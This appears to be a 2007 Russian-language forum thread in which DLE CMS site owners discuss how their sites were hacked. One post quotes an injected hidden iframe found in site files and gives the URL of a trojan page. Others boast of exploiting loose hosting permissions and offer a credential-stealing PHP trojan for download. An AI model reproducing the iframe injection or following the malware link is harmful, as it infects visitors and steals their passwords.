Помощь Проблема, хакнули...

piratto · 9 Апр 2007

MadMan, DLE 5.0 твой нулл содержит как минимум две инъекции и минимум три XSS. Меня хакали постоянно, пока на 5.3 не перешел.

jiganlimon@mail.ru · 9 Апр 2007

Народ та же проблема, хакнули 2 раза на 5.3 и на 5.5 , первый раз были заменены index.php на пустую страницу, второй раз всё было немного похуже в Index.php, main.tpl, и в какойто файл в папке engine (пришлось снести папку и закинуть другую, так как в каждом файле проверять времени не было) был прописан следуюший код:

<iframe src='http://мой сайт.ru/_vti_txt/' width='1' height='1' style='visibility: hidden;'></iframe> и при загрузке сайта начинал вопить антивирь... со ссылкой на
на страницу с трояном (ОСТОРОЖНО ВИРУС) codecsoft.net/adv/188/sploit.anr (ОСТОРОЖНО ВИРУС)

кто знает что за уроды, и как с этим боротся.....

Jerry · 9 Апр 2007

еслт два раза с разных версиях то это хостер или ты пароль прое.....

EcSYZ · 9 Апр 2007

Или просто айфреймеры купили себе приватный сплойт и хакают им всех подряд. От этого ничем не спасёшься.

piratto · 9 Апр 2007

Или просто айфреймеры купили себе приватный сплойт и хакают им всех подряд. От этого ничем не спасёшься.

Может быть что и сплоит, но почему не спасешся, спасемся тогда когда ДЛЕшники руки выпрямят и начнут писать скрипты без багов

artem · 10 Апр 2007

я как-то один сайтик хакал, а там у хостера права были выставлены так, что я почти все сайты, которые у него хостились хакануть мог...

kalit · 10 Апр 2007

artem написал(а):
я как-то один сайтик хакал, а там у хостера права были выставлены так, что я почти все сайты, которые у него хостились хакануть мог...

Да. Можно было бы и поживиться чем нибудь

kazak3 · 2 Июн 2007

EcSYZ написал(а):
Или просто айфреймеры купили себе приватный сплойт и хакают им всех подряд. От этого ничем не спасёшься.

всёж как обезопасится максимально?

eshkin · 3 Июн 2007

kazak3 написал(а):
всёж как обезопасится максимально?

для чувства максимальной безопасности юзать лицензию, утром и вечером бекапить и, в случае хака, журить разработчика

Если на лицензию аллергия - бекапить и ставить вовремя обновления

антивирь даже не упоминается

Barthez · 3 Июн 2007

все что вы тут обсуждаете это PHP трой называется audiv8index мощная штучка пишет странные инефреймы в index.php и после этого отсылает все ваши логи в нужное место тоесть пассы от FTP,ICQ,eMail,и др
PS: есть этот вирус в PHP файле кому надо есть у меня на сайте

Помощь Проблема, хакнули...

piratto

Постоялец

jiganlimon@mail.ru

Создатель

Jerry

тот самый Учиха

EcSYZ

Создатель

piratto

Постоялец

artem

Прохожие

kalit

Создатель

kazak3

Создатель

eshkin

Мой дом здесь!

Barthez

Постоялец